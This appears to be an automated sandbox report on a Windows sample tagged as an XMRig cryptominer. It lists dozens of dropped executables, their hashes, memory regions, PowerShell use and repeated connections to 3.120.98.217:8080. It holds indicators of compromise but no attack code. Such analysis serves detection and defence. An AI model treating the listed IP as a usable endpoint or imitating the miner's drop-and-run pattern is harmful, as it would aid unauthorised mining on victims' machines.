C:\Windows\System\tpSQxDD.exe

C:\Windows\System\tpSQxDD.exe

C:\Windows\System\qBCCrmQ.exe

C:\Windows\System\qBCCrmQ.exe

C:\Windows\System\nvNUwwz.exe

C:\Windows\System\nvNUwwz.exe

C:\Windows\System\cUsAhoq.exe

C:\Windows\System\cUsAhoq.exe

C:\Windows\System\zeQjSAp.exe

C:\Windows\System\zeQjSAp.exe

C:\Windows\System\StaYUtT.exe

C:\Windows\System\StaYUtT.exe

C:\Windows\System\HHzBfXe.exe

C:\Windows\System\HHzBfXe.exe

C:\Windows\System\Lrblgek.exe

C:\Windows\System\Lrblgek.exe

C:\Windows\System\jUvrZRH.exe

C:\Windows\System\jUvrZRH.exe

C:\Windows\System\YiAcCXa.exe

C:\Windows\System\YiAcCXa.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2104-0-0x000000013FC30000-0x0000000140022000-memory.dmp

memory/2104-1-0x00000000000F0000-0x0000000000100000-memory.dmp

\Windows\system\dLdNVMF.exe

MD5 f373e4b3825bbd009b3aab6ff679d933
SHA1 09f22b78a8e21a1c90cc386818511af7fe2dd5b9
SHA256 2536a95a74f8f3ce4854e79723a1ab1751a25ba27d8dce80efa9e04ff08a21f7
SHA512 fa9c1069a0e6b35994102f5dbdbda7f0f0acb31618b1074f3b618e991710d603b8065b6cd1bc6616d88e50a78a9c7103c870f291291fd31ee6fa7c0f18140b45

memory/2756-8-0x000000013FD10000-0x0000000140102000-memory.dmp

memory/2104-7-0x0000000003000000-0x00000000033F2000-memory.dmp

\Windows\system\pQQStOy.exe

MD5 d0a758922320ab5553654dddae523988
SHA1 c518317de3fb1c228a44e2475858301d06f77ff0
SHA256 0abbbc7b7e4d30939bd9b4ef8f1b34527a9957ff507aedaf629faf1cd9e216b4
SHA512 9466f94353dbc40a263802abc0b29b1c1982b74f8b16a9dea475e1daf29e0d772e9c1c39cfa135a4f38bbff48ac453da7d5147eeb51e677918d45d3e8cd7fe8a

memory/2580-19-0x000000013FF10000-0x0000000140302000-memory.dmp

memory/2104-18-0x0000000003000000-0x00000000033F2000-memory.dmp

memory/1280-20-0x000007FEF653E000-0x000007FEF653F000-memory.dmp

\Windows\system\GRPMjHs.exe

MD5 332bfe52c904e8fb897b9e68d1a84a89
SHA1 ba811f55159660fbd9ce351aa1a9faa363208480
SHA256 97699e7bfc2e55fcd557413a39db9d4a6a9198866e1f27a89e32456439bfc3aa
SHA512 ece2c71f731595c14a083e8acdf7b5c205a83d12d7fbd4db4fb5748f8e6a8ec4ace7ce99d2df029a89035822b1e63c1832d77abce17a24c917b4149cd9ba7b8d

memory/1280-24-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

memory/2104-23-0x0000000003660000-0x0000000003A52000-memory.dmp

memory/1280-22-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

memory/1280-33-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

C:\Windows\system\SEgDtWK.exe

MD5 ccb69ce5d717e5acd3824e8fb76d03d4
SHA1 66949131f0c697f0bf1e7a4139d9111b0941a937
SHA256 8fb51750ed6dae6ad6d239800935cf57de1081e124880491fb051f8a8aeadd67
SHA512 8e7322fcb75a3576d296447e308f53414ff79cb1bc35eebfcc5229f39211a66e105843d592fa3b5e5a3844a345c392774d799975c476e9b61a05ee850467f6f8

memory/2604-40-0x000000013FC30000-0x0000000140022000-memory.dmp

C:\Windows\system\ddNqIYi.exe

MD5 3ad8f5ec9f23bb5482c1f7b477b80e47
SHA1 6767218b7642e0eb01bd9077e58fb6def2cae64e
SHA256 e63ffac07a5669f6b6b010965f571977181814ebabdb9d8ab7ff4744fd40d672
SHA512 f18e05aee9c47b1cdc855cb05dc14382b15343a23b97e5f33fe4b960cbe1c543c65b4d36775a38d0f4246956e3df358fc586f0c55b675e65d51d8e612059b448

memory/2104-45-0x000000013F3A0000-0x000000013F792000-memory.dmp

C:\Windows\system\dxMeFqq.exe

MD5 da328d68e2d97d81aa4fa31eee797b2b
SHA1 333ed9e4892e978a768754e46fff4f8f0484332e
SHA256 be14c7fc7d4a753da1b316d6c65617edb4b0af241ec766423b9fd6985528e788
SHA512 9b6a95d24699fec6f9308b287177372f6531cc962956f42fb9f47cabaee949743e409e186b9b023a45bbdd4d861c460186a79d15beab906e7ca422d1b04c6c94

C:\Windows\system\QhMgukx.exe

MD5 b5c29f841bc8519faafac9835623eece
SHA1 8158722d0957f06d518378dd0d5efefa1455eb00
SHA256 39d1b4f91b1fd8039b5270a8d3dcea87b85f951b511665e9c045b22776c8f810
SHA512 4f3dfda5ce1c17d5e428494d3241846cca22288b3091274a1869e6af29663affd877c6d06592e58d5122f7b5d81a239d2ce6216c0e64ee2d1b1d304aa1259832

memory/2436-46-0x000000013F3A0000-0x000000013F792000-memory.dmp

C:\Windows\system\dlgUdEW.exe

MD5 a0229bddd2751e08c4f90e53af60e5f7
SHA1 c1e5a10bfcd2287c6a29d9eb2dbeaad1239830a7
SHA256 d6a6cf81b4b6325c28f2b36bbb9fd7b40cd3db35f2f5d41d9b413c073c525999
SHA512 3f1099abc020f3b4adfdc1b008ea82db2ba32355904236a1e9c607ea0b4ce3c8a4cfc82a145ad6da6bd19f71d4a689f665048bb35b2c67f8dd47f7e5a2520f11

\Windows\system\fnkPzvD.exe

MD5 7532f07c1f01c470f59bf65a48adc93e
SHA1 a156706c462eb22c0182957b91da4107f4d4060c
SHA256 c6c9793efe9888efcc381f396446967e37563500f1f2b22c845ff218cdcae0fb
SHA512 744f1537e144de74e738060474bd907dc964254a4e6b28650c3233ddf48ec7ef4ca823bfe154fec3941d897301a25dc19dd4c6d4dd7d8ad0286637f32bc6a8a2

C:\Windows\system\VKwSigU.exe

MD5 bd29031252e6742944e3a2c150930ae3
SHA1 71174aa4d45341c33b765ba28316b421940271d4
SHA256 b42a6f77caecb7dc8e2e142753922a4c0b702a678b88306a361c6d98b82f167f
SHA512 f3fcf8281cb3dcda96385734caf8e48bf16aab71d50077f1da954dccd88c196daff62c19113f084771cbef96cfad2fa2263d5b33bdd3a74b9fb24844cad215ce

\Windows\system\UwCUhag.exe

MD5 c0151ba82198bb3914c4cd1b07296a3a
SHA1 8db4871455c785d4cf50caeb9e77d0c28f32ad81
SHA256 b7c563c7e0a4de6f16b6aa055b783edd71c55ea2ea89e6050d90220e0a7f0d9d
SHA512 079ec7907e694f42ce4fe48ee9d27542ec98653299a4c1fad4ee4234ad3a2c72c823861833e5b64c48310c660b9db0c9578c74f7ba89f1bee301283fa2940ed6

C:\Windows\system\Bnoleor.exe

MD5 8720d99c5e42979f6772a3b473f68fdf
SHA1 b8d6d3d1c1190d95b2a61c1487b510e794d50a16
SHA256 8788820e41d620f7849d6b53256bb95ebc851679e17111e4b6876619414dfe0c
SHA512 cef8d1cd7f3a4c130b9fc17aa47674cf50afe5ae614179da425af5b80cc1ea41350942b41e37b785a202a8a072f9777e4feed650172da8ecb4e985dfa063fc0b

C:\Windows\system\zSZiufG.exe

MD5 af55875984bf6e49ecdb9d16cf55ec96
SHA1 2b096b5cd263b790be2be3ac157e9d4c0fa40fe5
SHA256 1c8f62bd08ac54a72fe3267c0e8ecfd9441ae17fb5229ad6c09f80b1610369cf
SHA512 7466514e799a22f94f46acd328b2952f6c851ec60ee8f52543a639ff09086796a418dc4d3128133916b52609884efe2496b699ad506a1899b1552f8d62636dcd

\Windows\system\rnSGyZj.exe

MD5 5d78621f98ff75bae68704ebac6576bb
SHA1 c152f1ad8ce866223bf5870c4e4c1c7c643bb7d7
SHA256 7347b0d5a10368bf2a00db5e30d7bd5160e7cacd4dfc133f94472f86fd9c8f83
SHA512 bbf239bfa056976378759e88bbbb060c02b3284efbcd1c4e329d3ee3dbda81cc50e51d2ec70ec124c086ba70f44b938827cbaab006a894b0c18e501dfd336162

memory/1280-84-0x000007FEF653E000-0x000007FEF653F000-memory.dmp

memory/1280-1384-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

memory/1280-321-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

\Windows\system\URmORMY.exe

MD5 9fd454f0e91d44df256edb43baad64a5
SHA1 f124587119167d3813ba3c1e919527dbdf45ce7d
SHA256 eab3841f3defaa48cd9fda762f87fb76f75eb1936ff0a9c063cf47227cf797e5
SHA512 7bb175396ac92078fb0df439eb012478c75e6142040a57336ad9934e3c0da5f59e29f2a527aa4f22d9e08ca7db596ce852d974cbeab1f7ffae950fcd8f203833

\Windows\system\ykgmVFq.exe

MD5 40db1c4f06ac332f68dcd6fb8c13c70e
SHA1 be7ff9a106af7c60b61080fdd7662ce114cf78e7
SHA256 11d6b2a2173f3f9b2b89a78fef16230e2f82f2cbf0625b135633eaeeb5799bf8
SHA512 a7c1bcae8338138296aff23ce3ce8a9cccc220eb0725c551f02932032bb07c4b2256e36591a3a07ac2a2e1c7972f641cb92babc3a8041a0d6182bab6f10b10ae

\Windows\system\kvuentt.exe

MD5 581095f72362e45457ba8f0c47e290a6
SHA1 fa6fc2588652d5d0f907562818332bec227126bd
SHA256 660119418a18de99cfb23b3c4f32838d2791d7b84fb97e654c2d35f9be349474
SHA512 5acf5a09a32884f39993796d91c0faa76ac5cc9ab4a0c2c636f1d3c179fc5f97b8812e017f06753f23e1a017629a4463da4f41194caac533c3e7fd8fc9591220

\Windows\system\gRPHbpG.exe

MD5 7946a48d9f5016a9b6c01c34741f6b4f
SHA1 50269a3005d4af639936f4608d4e23b32590dc28
SHA256 e681b972f66d111f67f4d6a5e7606b794129f32b2ccd84459733ab80f7868fdb
SHA512 5b569404f2cf4b5e40767b01c833a74863a66a5ad1e1c3bce157a8b93d83e68a5b0ffc78ba7be3ce776ed039e200376b2120953c83f0d63a984c11f9ec697aeb

\Windows\system\TWJalSQ.exe

MD5 d03d9d8f6a8d9870454f4e8402f006c1
SHA1 c9c00b0c08cc2a7ae791b3de8b9925f8c0dcf480
SHA256 3650344fb9e4e21a2cdd69c5e87ef2799d178ff258087035c07c5394f50bb87d
SHA512 670c23f80778996a6b1c1e69f9790070ad7a2d92f605759f34026cf9e4a8879c401569d8137ee2c10d381cfdd81491e206313d88a1c6be4422f5ab94e65c73f7

\Windows\system\Lqwywcq.exe

MD5 671b80d6382d1c417d82a84113986eb2
SHA1 28f6f9af8159c7579ff2915b6796bd9e8a80c291
SHA256 d29cedb9a5d27f7a9b1ebc2c271195d8331d0919a90c69621f6216f789cb1d5d
SHA512 525b852289ff20b3beb68afebddda83edfd8c92c6d403a23aa059e5e61fcecd2b9c75ad7327f77a6e647f8b7c840aff893ac0ad820e8ebeff1c33efef983e29e

\Windows\system\ofeXVXI.exe

MD5 b81488cf17082ffc2af8f5381c796515
SHA1 cfcaca43e2d269eb396f780c5104d3e53aa477db
SHA256 d61866ad02969c422e5bedaa4957eb32b77d1b44afe93e6654a33d3265278928
SHA512 4606b75239b7764b2f972ea3a947100e157caa77b8ed6a803d5b1bf5c7376b2fa228a10e2981b116455a7d3607d572b9570c0adef4543e73c585ecea2ac9a9f6

\Windows\system\RtDoYRP.exe

MD5 74d8b2b95f14097afacfa31095216991
SHA1 78d734381069a67ce21fcbef5cabc971eff3e432
SHA256 8768038290a08082e565fcd99206b4114d9bc44e21fc957e056bac7859eadeee
SHA512 809ca619c93b9825d7183389d68f550302b6f384dcf775c86229ccf675bc762464be0d9e65011cece4ba06ba995e4d564db15797ea4405ebc227f15051d612ee

\Windows\system\fZzgOAH.exe

MD5 3f1dc3a58ffdf66eb5cb1e96dc925cbb
SHA1 f65901a692f5c37f4c2f37bb9436443bd349cc14
SHA256 8cbe1b4dad586691b1350a319a81fcb45aaef0bd29075cda75d1c5b1527d0b9e
SHA512 fe17274935775a5b840aa28fc937a66b4270c94c4eccdd11ea567fd3b4ac4a092e45cba672cc624f4e5e2aafd2924a2f0a1c0baa31cb4fd1d0aff720c0ca6ff0

\Windows\system\ASlsBWT.exe

MD5 3adde0c8aad9b28aed563f3b9e541144
SHA1 c624550cd81ad3e837e65b33fb3f2b0cf16c69ad
SHA256 270dc4b3c04712e7e556f37e6bfd99c72b8383705c3715e11b615027015e34c8
SHA512 02bcfb2b0106547102ad9622afc20ad7e27f160e95b92bbea23ba0c5e24b2040f938c2172d8ad02e90b086e6afcf0fc022bf2af3df8216acaedc7e9275f6fe32

\Windows\system\pVnHuEl.exe

MD5 90b41b87215572daccfdaba2ad2eba75
SHA1 fd9c549eac850f8efdee8ec8c0d8ec910f0779b2
SHA256 86b94df39291ba9ede7642a7e09fb0e23904c4b4630afe18ff13b3294419d35c
SHA512 ca171bf729df85a1bf33795f5701d442e7a80b0a4099b5ec3a7e92ecacd159c14f26578830be5ef0b6ee97b47b39f370fcdb85e620b01d1fc3594340647afb14

\Windows\system\TWfkUTH.exe

MD5 d3cf7bd07a2147591222d5ccac556c14
SHA1 e2425041b2de5116d5667d238b6ec9d66d52269e
SHA256 608bd12d7b08d935eaed14aba2c9398781da7897545ad10585b8f6d7f1cde12b
SHA512 671ec866da0412b03605e87f43f730145d73124c4c9a7b703ded850edf70d0bd7d270a9433aa8b15efb3771457a4a35f94215a60b8d578ea15e81d29a078b868

C:\Windows\system\AOFoZlJ.exe

MD5 82c6508bd54f94ccd5ab8f1e120c99a6
SHA1 221505fc04fb4a3cb02b861edc04a01dc93ee532
SHA256 25b37e9fa577e7113d56d838d178e1d7626c60f7526059d9c80c046e0c97f3d1
SHA512 b1cab09bf2e5c632c2f379b4d1b6db2544d8a3e559c4bec25e0050b8a29e735dfdbb17ce79196f12b467965fe98d4ee739e8b6e1f831041fbff266e40a04d5c5

memory/2104-105-0x000000013F080000-0x000000013F472000-memory.dmp

memory/2556-104-0x000000013FD50000-0x0000000140142000-memory.dmp

memory/2104-103-0x0000000003660000-0x0000000003A52000-memory.dmp

memory/2104-102-0x0000000003660000-0x0000000003A52000-memory.dmp

memory/2104-100-0x000000013F180000-0x000000013F572000-memory.dmp

memory/2964-97-0x000000013FDD0000-0x00000001401C2000-memory.dmp

\Windows\system\HEPBsWU.exe

MD5 8a0d1edce4980e992d523fa05d4b4442
SHA1 4cdaad35975de77371346b142e11bbfc0fe80a67
SHA256 6564bfe36ad7922d4af1216bcab0604f209164cb2ef288408ac34dccdb1e268a
SHA512 11a9d333d46681a458ccdb5db328027e3387935d162ebfdad7a202871924653d2ca30011129608ccada321a398f5f1e78c1fd13923bbbd94a2d85c4f01db4ca1

\Windows\system\xJjMYFB.exe

MD5 1fba3f4b86848f2a1b66a1776001dae4
SHA1 a1f6fbe836f5bb2c5ab595107e368b1e52730037
SHA256 f61ba3cc7e5f69de2b41b50029e1107c5baaeda3acc499577bf05a6f4ed67b85
SHA512 561eb7558dc35dba8c8a177fbc8f7eff7f1ef6774865be579991f6f9595e2a9f8dcb047d9fcd35b8f134c0f3b925514245d842730bf49b2374652abec1c1ee55

C:\Windows\system\WuSQWiY.exe

MD5 6f186bbebee41a5f0a774e468d4ff8f8
SHA1 a4ead4636e1b42383ab43c4a80654ecb5351ed33
SHA256 664f595a73c7b7e880df7f95f4cc38eb4eabab35a71684a7159d09dc6b1e710e
SHA512 41b8f63406f08b6f69b64378b04ce9de4c0f462f996feab03d8439b9d8fabd369723b3054d284cf5405b8d2180d9be9c497e06d2ff40bfbac0d5936a7d5a27af

C:\Windows\system\FkKXgKc.exe

MD5 ab37b62b8380cf731c7d40595a977846
SHA1 4ed196870f5736d69b123b4537d4d3d2b0505a3d
SHA256 c20b14b10cf085863774adb4e49ba4a20d41e88f7384e88dca660de0e99ef3d9
SHA512 e94a635e783464340c0961951f21b5e7795e3bbe9a1a79ca8f830969aee98b24d9e7a5783f6bbf7244cd502fe64c011f3f5bc09e847d13fc315c707589dad25d

C:\Windows\system\vPsGhOX.exe

MD5 bff0f1d72c26e08e9ae4243494bbae9e
SHA1 83d258d09fb8eefaf48ce9696f216a55389490b0
SHA256 8028c4c04e5316dc88aef980ca5c33e11b97e2aa5c0e482a72cb7bb5e9e356a3
SHA512 bd639c39486e9c228fef72d778d79d02ad06c0ef134b07c29b25c8e411f9de487912f90e05553a6e3f6f3871fb7f7c250800cca189be8fc9d14b9078b9e78dd7

C:\Windows\system\JILWwNi.exe

MD5 0f6bfa41bc6c1afe83f6e84f61325a75
SHA1 c0be06e58e37d4d1c674382c59016814ed32d819
SHA256 cddf25ef6b218cbaf5609bd5e5dda5c0ed18d3111c237f9cfed488c752d6ed6c
SHA512 0a672f482427c3893cf87e820b3056c38399cc9dacce7b9b194e913400b58e5290a1f2c3962cc43300caa8c4964e69b27cfe711919d66182c8649f206a0d1612

C:\Windows\system\iHhRKfg.exe

MD5 e8dbb2fbe3811d721cf4e4d0d17f5bec
SHA1 0fdd80d85fc8aefa47d4055397232cbb62c2d131
SHA256 5744b2e130bb1a871d1936c9e596987aaab93a080780d7f89875117974ad36ce
SHA512 830fc8cdc3503f452e07a144712e769355a0e96ecf15f8bbc5f34cee48217a4b7c5d95bab05413103e5ab24b3e4d21ea4a8109e24d91914dcdaf96326d0b603c

C:\Windows\system\HiNLQSh.exe

MD5 e4889b2e0c60525a362c24fd4848f4eb
SHA1 907c74edbbc4d4d5ac3fb22c1a5a2d7cd253662d
SHA256 b3ac3c70736848605fe62bcb5d80a83809cf0ee651a5ebb84464d3a25d3abf0a
SHA512 ddd4db778520299c01fa25ddb95573550dfe58a8d39eaca33197e2d04d7c2aca8752c631dae0aa616416018ceee06cc0c3842cd63b886c06a0294e1d4245021d

C:\Windows\system\TiXqJSs.exe

MD5 99e56baf4ac0b624d111d9ff35fc3e31
SHA1 d43c95af0392caae0a8773b90011136731043e85
SHA256 fba63c8c1ee4c6894a69bfe576d77fdc7f72314a9fca6efe4c29d64a6bf16011
SHA512 81d273e4a14dc52ea9762bd2535fcf63b6cdf372b1c722b66ebebc1981845b4608edadeb57ca6a27363e46162086a87a84af4b1041d54c1a6c1ae2924922d748

C:\Windows\system\JeNehbm.exe

MD5 981c47b90bd7b8f4b4464ed1588285ff
SHA1 7758d2090e119bdde1f9b1c0fd26bbe1441b8dd0
SHA256 2b0ad919d1b42aa9a2e0978db03387ba6917f47c1291457b9284e542a5748dca
SHA512 92f960861e0b270dd283c0a82afdb301a400da308e07ca55be10302e0bc9c228a6ab177fd8318ba0c69f8e40472c4054cd40dc7e30371f08f284507fe5a127f8

memory/2956-80-0x000000013FB30000-0x000000013FF22000-memory.dmp

memory/1280-79-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

memory/2580-78-0x000000013FF10000-0x0000000140302000-memory.dmp

memory/2704-76-0x000000013F390000-0x000000013F782000-memory.dmp

memory/2008-75-0x000000013F630000-0x000000013FA22000-memory.dmp

memory/2756-72-0x000000013FD10000-0x0000000140102000-memory.dmp

C:\Windows\system\cvhaHCh.exe

MD5 ce8f9c21403101dd9ba1946010ec2619
SHA1 4d02c2dd393024651c425077b708a72be4d6f657
SHA256 f16473261ca570c16d9194b8eaa04aa47f96fc7209301e60971b78bc5c15cef2
SHA512 51b69dc5ceb966e58eadd2f96ed5cd39623e56494cefc8c67041f8180fc59b759c9229e42c9ff44a3a8736c9603db90ff9a16b24a764d01f1484da790c8d58cc

memory/2104-69-0x000000013FC30000-0x0000000140022000-memory.dmp

memory/2104-68-0x0000000003660000-0x0000000003A52000-memory.dmp

memory/2104-66-0x000000013F630000-0x000000013FA22000-memory.dmp

memory/2508-65-0x000000013F970000-0x000000013FD62000-memory.dmp

memory/2104-58-0x0000000003660000-0x0000000003A52000-memory.dmp

C:\Windows\system\IxotWxT.exe

MD5 b1765523148591eb55ab257b5c38813a
SHA1 d4940fb4511a56dacce19fcae5d93cc02d680396
SHA256 2efb193009ffa2566126c7b2c695de7ac04361fe566519a0c55b054c1b725bd3
SHA512 f943b74ab3a4dfd5e9bf2cb36ab96561715fbb8c83a4454d08ac705c1deb7fab590649d1648e8bcd04b5cc20ace4f7ac773b781abcdab91aece1b76d8bee7291

memory/2104-39-0x0000000003660000-0x0000000003A52000-memory.dmp

memory/1280-32-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

memory/2556-30-0x000000013FD50000-0x0000000140142000-memory.dmp

memory/1280-29-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

memory/2704-4592-0x000000013F390000-0x000000013F782000-memory.dmp

C:\Windows\system\FaQWrZF.exe

MD5 15dc6af7faadf9f056674434750f301f
SHA1 786a1466ec663a8f39f1cb6ae0553a8131107212
SHA256 22e5134ab5dd7b72c321d1d70a8f322fc70112702dd452292f6b4f315f8e1f75
SHA512 3534bfb65bd19eec58c8053bcce9caca4e02063bbe00500206951854ed2c6e1889e5a2eba58d2f95464bc3ddf5b518b5aef67c7acb8a34075a21ec73da48446a

memory/2756-6113-0x000000013FD10000-0x0000000140102000-memory.dmp

memory/2436-6272-0x000000013F3A0000-0x000000013F792000-memory.dmp

memory/2580-6274-0x000000013FF10000-0x0000000140302000-memory.dmp

memory/2556-6273-0x000000013FD50000-0x0000000140142000-memory.dmp

memory/2956-6275-0x000000013FB30000-0x000000013FF22000-memory.dmp

memory/2964-6276-0x000000013FDD0000-0x00000001401C2000-memory.dmp

memory/2508-6282-0x000000013F970000-0x000000013FD62000-memory.dmp

memory/2104-10991-0x000000013F3A0000-0x000000013F792000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 21:27

Reported

2024-05-22 21:29

Platform

win10v2004-20240426-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\NdphFcf.exe N/A
N/A N/A C:\Windows\System\xgAvRQE.exe N/A
N/A N/A C:\Windows\System\WdQXNNQ.exe N/A
N/A N/A C:\Windows\System\uwkwFEY.exe N/A
N/A N/A C:\Windows\System\SwXdctl.exe N/A
N/A N/A C:\Windows\System\aKqSdGD.exe N/A
N/A N/A C:\Windows\System\DNSvnae.exe N/A
N/A N/A C:\Windows\System\BDBNIWF.exe N/A
N/A N/A C:\Windows\System\kFfuBHD.exe N/A
N/A N/A C:\Windows\System\LtzHhPv.exe N/A
N/A N/A C:\Windows\System\tHrKygf.exe N/A
N/A N/A C:\Windows\System\xZEjcYb.exe N/A
N/A N/A C:\Windows\System\wZsZhpK.exe N/A
N/A N/A C:\Windows\System\zKMqbwL.exe N/A
N/A N/A C:\Windows\System\qyjwxLN.exe N/A
N/A N/A C:\Windows\System\EHSYwaK.exe N/A
N/A N/A C:\Windows\System\bVWjLTA.exe N/A
N/A N/A C:\Windows\System\NJQGeKj.exe N/A
N/A N/A C:\Windows\System\eyLWvnO.exe N/A
N/A N/A C:\Windows\System\BOkFzyq.exe N/A
N/A N/A C:\Windows\System\dluysCY.exe N/A
N/A N/A C:\Windows\System\VbdFhHk.exe N/A
N/A N/A C:\Windows\System\bsLmRio.exe N/A
N/A N/A C:\Windows\System\dGEVtPI.exe N/A
N/A N/A C:\Windows\System\NfVsmYE.exe N/A
N/A N/A C:\Windows\System\nwqCazX.exe N/A
N/A N/A C:\Windows\System\BkimbLS.exe N/A
N/A N/A C:\Windows\System\xwSXYDt.exe N/A
N/A N/A C:\Windows\System\ZIvfKVq.exe N/A
N/A N/A C:\Windows\System\ckAoCpL.exe N/A
N/A N/A C:\Windows\System\TRWESFt.exe N/A
N/A N/A C:\Windows\System\TIcCpKc.exe N/A
N/A N/A C:\Windows\System\pEfCnzK.exe N/A
N/A N/A C:\Windows\System\CFrfDZH.exe N/A
N/A N/A C:\Windows\System\GZIgJrq.exe N/A
N/A N/A C:\Windows\System\phHoCBY.exe N/A
N/A N/A C:\Windows\System\mZDbyLF.exe N/A
N/A N/A C:\Windows\System\QwiKWSz.exe N/A
N/A N/A C:\Windows\System\XgAhpJn.exe N/A
N/A N/A C:\Windows\System\qeXwFzl.exe N/A
N/A N/A C:\Windows\System\OjRxwcf.exe N/A
N/A N/A C:\Windows\System\KLmAQvq.exe N/A
N/A N/A C:\Windows\System\YaRMNtA.exe N/A
N/A N/A C:\Windows\System\dfzFIQM.exe N/A
N/A N/A C:\Windows\System\WzOdFoc.exe N/A
N/A N/A C:\Windows\System\JqAsXei.exe N/A
N/A N/A C:\Windows\System\eYrQPXU.exe N/A
N/A N/A C:\Windows\System\dNpVUin.exe N/A
N/A N/A C:\Windows\System\eHmkYhX.exe N/A
N/A N/A C:\Windows\System\mkTTbFV.exe N/A
N/A N/A C:\Windows\System\qqoKFVO.exe N/A
N/A N/A C:\Windows\System\oJdiTsx.exe N/A
N/A N/A C:\Windows\System\QZpkuye.exe N/A
N/A N/A C:\Windows\System\GvWHJUy.exe N/A
N/A N/A C:\Windows\System\pvKirCx.exe N/A
N/A N/A C:\Windows\System\ndQFuTh.exe N/A
N/A N/A C:\Windows\System\oATAIWU.exe N/A
N/A N/A C:\Windows\System\QBTBxsE.exe N/A
N/A N/A C:\Windows\System\JLVZwNK.exe N/A
N/A N/A C:\Windows\System\GmhYvxT.exe N/A
N/A N/A C:\Windows\System\YAbdSwZ.exe N/A
N/A N/A C:\Windows\System\JQvzgXC.exe N/A
N/A N/A C:\Windows\System\Vzdyzfm.exe N/A
N/A N/A C:\Windows\System\cqkUinN.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\CQmztVp.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\zdtsKQX.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\GVMsPxw.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\IRRUBQx.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\TwMrIKK.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\WuBjOLD.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\sOgIQuF.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
